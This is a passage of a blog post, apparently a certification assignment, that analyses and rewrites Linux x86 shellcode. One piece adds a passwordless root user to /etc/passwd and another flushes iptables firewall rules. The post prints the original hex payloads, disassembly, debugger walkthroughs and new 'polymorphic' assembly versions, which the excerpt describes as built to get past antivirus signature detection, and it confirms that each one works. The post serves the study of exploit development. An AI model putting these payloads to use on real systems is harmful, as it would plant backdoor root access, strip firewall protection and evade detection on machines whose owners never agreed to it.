class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint open(const char *pathname, int flags);\n<\/pre><\/div>\n\n\n<p>Next, the arguments for the syscall to <strong>open<\/strong> are arranged in the registers prior to the call below:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103952.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following the syscall, the file descriptor for the <strong>\/etc\/passwd<\/strong> file is moved from <strong>EAX<\/strong> into <strong>EBX<\/strong>, and a new value <strong>0x4<\/strong> is moved into <strong>EAX<\/strong>. This value <strong>0x4<\/strong> corresponds to the <strong>write<\/strong> syscall.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509104403.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>write<\/strong> function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t count);\n<\/pre><\/div>\n\n\n<p>Following this, the string to write into <strong>\/etc\/passwd<\/strong> is pushed to the stack. As per the function header for the <strong>write<\/strong> syscall, the value to write into the file is pointed to by the <strong>ECX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509104706.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Prior to the call to <strong>write<\/strong>, the syscall arguments are arranged as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509105559.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To close the file, the <strong>close<\/strong> syscall is used, and takes the file descriptor of the file it will close.<\/p>\n\n\n\n<p>The <strong>close<\/strong> function header is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint close(int fd);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111026.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the modified file is closed, the <strong>exit<\/strong> syscall is called, by moving <strong>0x1<\/strong> into <strong>EAX<\/strong> and calling <strong>int 0x80<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111215.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following our analysis of the shellcode, we check our local <strong>\/etc\/passwd<\/strong> file and confirm that the new user r00t has been appended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509111247.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 2: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. The original shellcode size is <strong>69 bytes<\/strong>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n\/* By Kris Katterjohn 11\/14\/2006\n *\n * 69 byte shellcode to add root user 'r00t' with no password to \/etc\/passwd\n *\n * for Linux\/x86\n *\n *\n *\n * section .text\n *\n *      global _start\n *\n * _start:\n *\n * ; open(&quot;\/etc\/\/passwd&quot;, O_WRONLY | O_APPEND)\n *\n *      push byte 5\n *      pop eax\n *      xor ecx, ecx\n *      push ecx\n *      push 0x64777373\n *      push 0x61702f2f\n *      push 0x6374652f\n *      mov ebx, esp\n *      mov cx, 02001Q\n *      int 0x80\n *\n *      mov ebx, eax\n *\n * ; write(ebx, &quot;r00t::0:0:::&quot;, 12)\n *\n *      push byte 4\n *      pop eax\n *      xor edx, edx\n *      push edx\n *      push 0x3a3a3a30\n *      push 0x3a303a3a\n *      push 0x74303072\n *      mov ecx, esp\n *      push byte 12\n *      pop edx\n *      int 0x80\n *\n * ; close(ebx)\n *\n *      push byte 6\n *      pop eax\n *      int 0x80\n *\n * ; exit()\n *\n *      push byte 1\n *      pop eax\n *      int 0x80\n *\/\n<\/pre><\/div>\n\n\n<p>Our updated version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; adduser_polymorphic.nasm - 45 bytes\n; Author: Jack McBride (PA-6483)\n; Website:  https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        jmp _cmd\n\n_main:\n        pop edx;        store string to be added to \/etc\/passwd\n        push byte 0x46\n        pop eax\n        int 0x80;       call setreuid\n        mov al, 0x5\n        push ecx\n        push 0x64777373\n        push 0x61702f2f\n        push 0x6374652f\n        mov ebx, esp\n        inc ecx\n        mov ch, 0x4\n        int 0x80;       call open on \/etc\/passwd with 401 flags\n        xor ecx, ecx\n        push ecx\n        xchg ecx, edx\n        xchg ebx, eax\n        xor eax, eax\n        mov al, 0x4\n        mov edx, 0x1A\n        int 0x80;       call write to append new user to \/etc\/passwd\n        xchg eax, esi\n        int 0x80\n\n_cmd:\n        call _main\n        db &quot;r00t::0:0::\/root:\/bin\/bash&quot;, 0xA\n<\/pre><\/div>\n\n\n<p>Our <strong>polymorphic<\/strong> version is <strong>45 bytes<\/strong> (24 bytes less than the original) = <strong>42% size decrease<\/strong>.<\/p>\n\n\n\n<p>To improve efficiency over the original shellcode, we opted to use the <strong>jmp-call-pop<\/strong> technique instead of pushing the hex encoded values for the new user account to the stack.<\/p>\n\n\n\n<p>In addition, we remove any unnecessary changes to registers, namely <strong>XOR<\/strong> instructions designed to clear registers that are already cleared. Additionally, we have removed the syscall to <strong>close<\/strong> the file descriptor for <strong>\/etc\/passwd<\/strong> once we have finished writing to it, as the operating system will do this automatically for us following the call to <strong>exit<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 3: Linux\/x86 - iptables -F - 70 bytes<\/h2>\n\n\n\n<p>The final shellcode that we will analyse is designed to flush all host-based firewall rules by issuing the <strong>iptables -F<\/strong> command.<\/p>\n\n\n\n<p>This can be used on a host which is blocking network communications to management ports such as SSH and might be later used by an attacker during the post-exploitation phase to perform further actions which require having a shell on the machine.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nAuthor: zillion\nEmail: zillion@safemode.org\nHome: http:\/\/www.safemode.org\n\nLinux x86 shellcode that does an execve() of \/sbin\/iptables -F in order to\nflush activated firewall rules.\n\nFile: flush-iptables-shell.c\n\n\/*\n * This shellcode will do \/sbin\/iptables -F\n * Written by zillion@safemode.org\n *\n *\/\n\nchar shellcode&#x5B;]=\n        &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d&quot;\n        &quot;\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12&quot;\n        &quot;\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e&quot;\n        &quot;\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34&quot;\n        &quot;\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n  int *ret;\n  ret = (int *)&amp;ret + 2;\n  (*ret) = (int)shellcode;\n}\n<\/pre><\/div>\n\n\n<p>To begin, we disassemble the shellcode into its assembly instructions using ndisasm:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho -ne &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot; | ndisasm -u -\n00000000  EB21              jmp short 0x23\n00000002  5E                pop esi\n00000003  31C0              xor eax,eax\n00000005  88460E            mov &#x5B;esi+0xe],al\n00000008  884611            mov &#x5B;esi+0x11],al\n0000000B  897612            mov &#x5B;esi+0x12],esi\n0000000E  8D5E0F            lea ebx,&#x5B;esi+0xf]\n00000011  895E16            mov &#x5B;esi+0x16],ebx\n00000014  89461A            mov &#x5B;esi+0x1a],eax\n00000017  B00B              mov al,0xb\n00000019  89F3              mov ebx,esi\n0000001B  8D4E12            lea ecx,&#x5B;esi+0x12]\n0000001E  8D561A            lea edx,&#x5B;esi+0x1a]\n00000021  CD80              int 0x80\n00000023  E8DAFFFFFF        call 0x2\n00000028  2F                das\n00000029  7362              jnc 0x8d\n0000002B  696E2F69707461    imul ebp,&#x5B;esi+0x2f],dword 0x61747069\n00000032  626C6573          bound ebp,&#x5B;ebp+0x73]\n00000036  382D46323334      cmp &#x5B;dword 0x34333246],ch\n0000003C  3536373839        xor eax,0x39383736\n00000041  61                popa\n00000042  626364            bound esp,&#x5B;ebx+0x64]\n00000045  65                gs\n<\/pre><\/div>\n\n\n<p>As this shellcode is using the <strong>jmp-call-pop<\/strong> technique, we notice that the assembly instructions that we get from ndisasm don't exactly match the commented assembly provided by the shellcode author.<\/p>\n\n\n\n<p>We can investigate further using GDB.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into the C program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n\n<\/pre><\/div>\n\n\n<p>We compile it with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We then start GDB and set two breakpoints: one on the <strong>main<\/strong> function, and the next at the first assembly instruction in the <strong>code<\/strong> variable as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510215248.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the initial instructions, we note that the code is performing the <strong>jmp-call-pop<\/strong> technique to push the command to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510215914.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, the command string is broken down into segments by inserting null bytes into the <strong>ESI<\/strong> register at specific offsets:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510221052.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Based on the argument structure of <strong>execve<\/strong>, the first argument is the <strong>pathname<\/strong> of the program that is being executed. As the shellcode is executing the <strong>iptables -F<\/strong> command, the <strong>pathname<\/strong> argument will be set to <strong>\/sbin\/iptables<\/strong> and <strong>argv<\/strong> will be set to <strong>-F<\/strong>.<\/p>\n\n\n\n<p>The function header for <strong>execve<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>In order to supply the arguments to <strong>execve<\/strong>, they are pushed as strings to the stack and appended with a null terminator to indicate the end of each string. Once this is done, a pointer to the pathname and a pointer to the arguments are moved into the <strong>EBX<\/strong> and <strong>ECX<\/strong> registers respectively.<\/p>\n\n\n\n<p>Next, for the call to <strong>execve<\/strong>, the value <strong>0x11<\/strong> is moved into <strong>EAX<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510222420.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally, the syscall to <strong>execve<\/strong> is called.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510222731.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Checking the output of the <strong>iptables -L<\/strong> command, we confirm that the iptables entry on our machine is empty, indicating that the shellcode worked as intended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510223708.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 3: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. The original shellcode is <strong>70 bytes<\/strong> in size.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nAuthor: zillion\nEmail: zillion@safemode.org\nHome: http:\/\/www.safemode.org\n\nLinux x86 shellcode that does an execve() of \/sbin\/iptables -F in order to\nflush activated firewall rules.\n\nFile: flush-iptables-shell.c\n\n\/*\n * This shellcode will do \/sbin\/iptables -F\n * Written by zillion@safemode.org\n *\n *\/\n\nchar shellcode&#x5B;]=\n        &quot;\\xeb\\x21\\x5e\\x31\\xc0\\x88\\x46\\x0e\\x88\\x46\\x11\\x89\\x76\\x12\\x8d&quot;\n        &quot;\\x5e\\x0f\\x89\\x5e\\x16\\x89\\x46\\x1a\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x12&quot;\n        &quot;\\x8d\\x56\\x1a\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x2f\\x73\\x62\\x69\\x6e&quot;\n        &quot;\\x2f\\x69\\x70\\x74\\x61\\x62\\x6c\\x65\\x73\\x38\\x2d\\x46\\x32\\x33\\x34&quot;\n        &quot;\\x35\\x36\\x37\\x38\\x39\\x61\\x62\\x63\\x64\\x65&quot;;\n\nint main()\n{\n\n  int *ret;\n  ret = (int *)&amp;ret + 2;\n  (*ret) = (int)shellcode;\n}\n<\/pre><\/div>\n\n\n<p>Our updated version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; flush_iptables_polymorphic - 49 bytes\n; Author: Jack McBride (PA-6483)\n; Website: https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        xor edx,edx\n        ; push -F\n        push edx\n        push word 0x462d\n        mov eax, esp; save pointer to second argument in EAX\n        ; push \/sbin\/iptables\n        push edx\n        push 0x73656c62\n        push 0x61747069\n        push 0x2f2f6e69\n        push 0x62732f2f\n        ; move pointer to file name into ebx\n        mov ebx, esp\n        push edx\n        push eax; push second argument\n        push ebx; push first argument\n        mov ecx, esp\n        xor eax, eax\n        mov     al,0xb\n        int     0x80\n        xor eax, eax\n        mov al, 0x1\n        int 0x80\n<\/pre><\/div>\n\n\n<p>Our polymorphic version is <strong>49 bytes<\/strong> (21 bytes less than the original) = <strong>35% size decrease<\/strong>.<\/p>\n\n\n\n<p>In the original, the shellcode leveraged the <strong>jmp call pop<\/strong> procedure to initially push the command to execute to the stack. In our version, instead the shellcode writes the pathname of the <strong>\/sbin\/iptables<\/strong> command to the stack, and then pushes its <strong>-F<\/strong> argument to the stack as well. This saves us some instructions as we do not have to make as many modifications to the <strong>ESI<\/strong> register as was the case in the original.<\/p>\n\n\n\n<p>We next appropriately append null bytes to the arguments we have pushed where needed, and make the call to the <strong>exexce<\/strong> syscall. In addition to this, we consolidated space by removing any unnecessary calls to clear or modify registers.<\/p>\n\n\n\n<p>We run the new polymorphic shellcode and confirm that it works as expected:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220510231852.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>This concludes our analysis of polymorphism, and our process of applying it to the refactoring of our three example shellcodes from ShellStorm.<\/p>\n\n\n\n<p>The Assembly and C source code for my polymorphic shellcode implementations can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was tested on 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering our implementation of a custom crypter using the AES encryption cipher.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering the concept of polymorphism, and how it can be used to modify shellcode to bypass antivirus signature detection. This post follows on in our blog series created for the SLAE32 certification course provided by Pentester Academy. Overview Antivirus solutions tend to rely on two main detection mechanisms&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-286","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=286"}],"version-history":[{"count":18,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286\/revisions"}],"predecessor-version":[{"id":735,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/286\/revisions\/735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}